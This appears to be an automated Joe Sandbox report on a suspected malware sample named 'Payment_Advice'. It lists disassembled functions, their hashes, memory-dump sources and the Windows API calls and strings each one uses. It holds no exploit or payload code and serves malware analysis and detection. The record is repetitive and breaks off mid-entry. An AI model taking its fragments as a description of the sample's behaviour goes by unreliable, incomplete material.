                                                                                                    • Instruction ID: efce6c40ceaf442b8eb76e5752340f72ae75ed26b27b5415d38b13f46d7dd350
                                                                                                    • Opcode Fuzzy Hash: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                                                                    • Instruction Fuzzy Hash: FB62A1716083499FDB15CF2CC8809B9BFF1BF99304F18896DE89A8B346D630E985CB55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050F461 Relevance: .7, Instructions: 694COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                                                                                                    • Instruction ID: 47630a132885c1f7c5192660667277210b57bade1b528d3a367532f2a9dcbc05
                                                                                                    • Opcode Fuzzy Hash: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                                                                                                    • Instruction Fuzzy Hash: 06524A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00517153 Relevance: .5, Instructions: 536COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 20bf4cef5cef176c49850f8131e28f5ed4baf0b9d3ea7ca0cad3fa9fadd44204
                                                                                                    • Instruction ID: 3aef52d4e0c8f199732084ad6417ce4ed1c9a0b28c64a686510853ac097f11aa
                                                                                                    • Opcode Fuzzy Hash: 20bf4cef5cef176c49850f8131e28f5ed4baf0b9d3ea7ca0cad3fa9fadd44204
                                                                                                    • Instruction Fuzzy Hash: C412C3B160870A9FD718CF2CC494AB9BBF1FF98304F14892DE996C7681D334A995CB45
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050C426 Relevance: .5, Instructions: 454COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3a8abe1862ccffab01e24c7c57877abc7046e480e245a5e07e6a8200ae0f98cd
                                                                                                    • Instruction ID: 3dcca2ac8fc2aeb364c1a919bd07ac562e19de08c861fbe3e69a58f17f37e70f
                                                                                                    • Opcode Fuzzy Hash: 3a8abe1862ccffab01e24c7c57877abc7046e480e245a5e07e6a8200ae0f98cd
                                                                                                    • Instruction Fuzzy Hash: 9CF17771A083158FC728CF28C58862EBFE5FFCA314F254B2EF48597296D631E9458B46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050E9B7 Relevance: .3, Instructions: 320COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4a5abdab17420c5a85c4c1e100ecd13286d468e1db2eb3f94771506c5e93e242
                                                                                                    • Instruction ID: af397b0d1a09f7935dcf3e8cfcced3fa09cf68dca08f0ced1f3d9bb87a607a1b
                                                                                                    • Opcode Fuzzy Hash: 4a5abdab17420c5a85c4c1e100ecd13286d468e1db2eb3f94771506c5e93e242
                                                                                                    • Instruction Fuzzy Hash: 30E16C795083948FD314CF29D8909AABFF0BF9A304F45095EF9C497392C235EA19DB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00514088 Relevance: .3, Instructions: 270COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                                                                    • Instruction ID: 527e79486eaa20a699bacdb41086c3db33c528b21b67beed496654ddb2c02abb
                                                                                                    • Opcode Fuzzy Hash: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                                                                    • Instruction Fuzzy Hash: 2E9126B12003469BEB24EA64D899BFE7FD5FB91300F100D2DE5A6872C2EA7495C5CB52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005143BF Relevance: .2, Instructions: 243COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                    • Instruction ID: 26d1ad14d68e5218b69f0b37636a6f5647343253c67bef2ed476dcf8eb4ed572
                                                                                                    • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                    • Instruction Fuzzy Hash: D28128713043464BFF24DE68C895BFD7F95BBD1308F045D2DE9868B282DAA489C68B52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005251C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d21462af2fb79a1e7d84c93a09bbbcffa25119219e39f00fea21295955b14e96
                                                                                                    • Instruction ID: 18e3ff91e3803a9623c404ee0334cd57c5c0727b03ba86c21ecd9df6adbae1b6
                                                                                                    • Opcode Fuzzy Hash: d21462af2fb79a1e7d84c93a09bbbcffa25119219e39f00fea21295955b14e96
                                                                                                    • Instruction Fuzzy Hash: F0617539600F39A6CF389A6878997BE2B94FF63350F541D19E442DB2C1F2B1DD428651
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00524F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                                                                    • Instruction ID: 5217ff14c2130534e2a22ab1495831f2106183465b0bf0a1f63b8c177d5e49da
                                                                                                    • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                                                                    • Instruction Fuzzy Hash: E6512461200E7556DF385628BA5EBBE2F85BF83300F184819E983CB2C2F635ED45C696
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050EFE2 Relevance: .2, Instructions: 161COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7034bb8cbdb427f505e738eb21928d64d6686fac1a60660fdd38e2aaf1611f5a
                                                                                                    • Instruction ID: c871431f53792741444f640cc3555f6c08dfc6aed5993e317a0a00f8146d082f
                                                                                                    • Opcode Fuzzy Hash: 7034bb8cbdb427f505e738eb21928d64d6686fac1a60660fdd38e2aaf1611f5a
                                                                                                    • Instruction Fuzzy Hash: 4951D4315083D58EC721CF25C5984AEBFE0BFDA314F4909ADE4D95B683C231DA4ACB62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005100B7 Relevance: .1, Instructions: 141COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 18c5b8a0116227a962686d03b9001e832b0f9c4c93c63f6d81b26a0e562a2cf3
                                                                                                    • Instruction ID: 89a7e480c4a59fe023087e9647129b96f13687fee7d3c302d02e1f713bfe2c4b
                                                                                                    • Opcode Fuzzy Hash: 18c5b8a0116227a962686d03b9001e832b0f9c4c93c63f6d81b26a0e562a2cf3
                                                                                                    • Instruction Fuzzy Hash: AB51D0B1A087159FC748CF19D48055AFBE1FF88314F058A2EE899E3341D734E999CB96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00513E0B Relevance: .1, Instructions: 112COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                    • Instruction ID: adc6f18ed3d01e48818b15b02221a23bcaf7f71a220e2d8bbceafaf11463e380
                                                                                                    • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                    • Instruction Fuzzy Hash: D831E4B1A147468FDB14DF28C8652AEBFE0FB95304F148A2DE485D7341C738EA4ACB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051C73F Relevance: 51.2, APIs: 24, Strings: 5, Instructions: 428windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0051C744
                                                                                                      • Part of subcall function 0051B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0051B3FB
                                                                                                      • Part of subcall function 0051AF98: _wcschr.LIBVCRUNTIME ref: 0051B033
                                                                                                    • _wcslen.LIBCMT ref: 0051CA0A
                                                                                                    • _wcslen.LIBCMT ref: 0051CA13
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0051CA71
                                                                                                    • _wcslen.LIBCMT ref: 0051CAB3
                                                                                                    • _wcsrchr.LIBVCRUNTIME ref: 0051CBFB
                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0051CC36
                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0051CC46
                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,0054A472), ref: 0051CC54
                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0051CC7F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                                                    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$Q
                                                                                                    • API String ID: 986293930-1471198225
                                                                                                    • Opcode ID: 7d7da006f23f6ad63a0f71a73cd4bae9367a202454eb21618627dab6dd0214ef
                                                                                                    • Instruction ID: c91a847727c51c4faec925e353a73fd8bfc2bea57a4023e4414b1fb6bd33989f
                                                                                                    • Opcode Fuzzy Hash: 7d7da006f23f6ad63a0f71a73cd4bae9367a202454eb21618627dab6dd0214ef
                                                                                                    • Instruction Fuzzy Hash: 26E15472940219AAEF25DBA4DD89DEE7BBCBF45310F4044A5F645E7080EB749EC88B60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050E2E8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 234COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _swprintf.LIBCMT ref: 0050E30E
                                                                                                      • Part of subcall function 00504092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005040A5
                                                                                                      • Part of subcall function 00511DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00541030,?,0050D928,00000000,?,00000050,00541030), ref: 00511DC4
                                                                                                    • _strlen.LIBCMT ref: 0050E32F
                                                                                                    • SetDlgItemTextW.USER32(?,0053E274,?), ref: 0050E38F
                                                                                                    • GetWindowRect.USER32(?,?), ref: 0050E3C9
                                                                                                    • GetClientRect.USER32(?,?), ref: 0050E3D5
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0050E475
                                                                                                    • GetWindowRect.USER32(?,?), ref: 0050E4A2
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0050E4DB
                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 0050E4E3
                                                                                                    • GetWindow.USER32(?,00000005), ref: 0050E4EE
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0050E51B
                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0050E58D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                    • String ID: $%s:$CAPTION$d$tS
                                                                                                    • API String ID: 2407758923-1013587617
                                                                                                    • Opcode ID: 394505c7150ba2e35dfaa27da79ee56f25eda703f5abec3f4c5dd8b38849bbc0
                                                                                                    • Instruction ID: a94cb400238003dd6e63ad75c06c1c829b811f51092e9220e8f9b5e0638607fd
                                                                                                    • Opcode Fuzzy Hash: 394505c7150ba2e35dfaa27da79ee56f25eda703f5abec3f4c5dd8b38849bbc0
                                                                                                    • Instruction Fuzzy Hash: A0819071608341AFD710DFA8CD89A6FBBE9FBC9704F04091DFA8497291D670E909CB52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052CB22 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___free_lconv_mon.LIBCMT ref: 0052CB66
                                                                                                      • Part of subcall function 0052C701: _free.LIBCMT ref: 0052C71E
                                                                                                      • Part of subcall function 0052C701: _free.LIBCMT ref: 0052C730
                                                                                                      • Part of subcall function 0052C701: _free.LIBCMT ref: 0052C742
                                                                                                      • Part of subcall function 0052C701: _free.LIBCMT ref: 0052C754
                                                                                                      • Part of subcall function 0052C701: _free.LIBCMT ref: 0052C766
                                                                                                      • Part of subcall function 0052C701: _free.LIBCMT ref: 0052C778
                                                                                                      • Part of subcall function 0052C701: _free.LIBCMT ref: 0052C78A
                                                                                                      • Part of subcall function 0052C701: _free.LIBCMT ref: 0052C79C
                                                                                                      • Part of subcall function 0052C701: _free.LIBCMT ref: 0052C7AE
                                                                                                      • Part of subcall function 0052C701: _free.LIBCMT ref: 0052C7C0
                                                                                                      • Part of subcall function 0052C701: _free.LIBCMT ref: 0052C7D2
                                                                                                      • Part of subcall function 0052C701: _free.LIBCMT ref: 0052C7E4
                                                                                                      • Part of subcall function 0052C701: _free.LIBCMT ref: 0052C7F6
                                                                                                    • _free.LIBCMT ref: 0052CB5B
                                                                                                      • Part of subcall function 00528DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0052C896,?,00000000,?,00000000,?,0052C8BD,?,00000007,?,?,0052CCBA,?), ref: 00528DE2
                                                                                                      • Part of subcall function 00528DCC: GetLastError.KERNEL32(?,?,0052C896,?,00000000,?,00000000,?,0052C8BD,?,00000007,?,?,0052CCBA,?,?), ref: 00528DF4
                                                                                                    • _free.LIBCMT ref: 0052CB7D
                                                                                                    • _free.LIBCMT ref: 0052CB92
                                                                                                    • _free.LIBCMT ref: 0052CB9D
                                                                                                    • _free.LIBCMT ref: 0052CBBF
                                                                                                    • _free.LIBCMT ref: 0052CBD2
                                                                                                    • _free.LIBCMT ref: 0052CBE0
                                                                                                    • _free.LIBCMT ref: 0052CBEB
                                                                                                    • _free.LIBCMT ref: 0052CC23
                                                                                                    • _free.LIBCMT ref: 0052CC2A
                                                                                                    • _free.LIBCMT ref: 0052CC47
                                                                                                    • _free.LIBCMT ref: 0052CC5F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                    • String ID: hS
                                                                                                    • API String ID: 161543041-2356671337
                                                                                                    • Opcode ID: 2498362b9781d22f364279affc93e93bc76db478f0dc5e50037bc8b70f1460ee
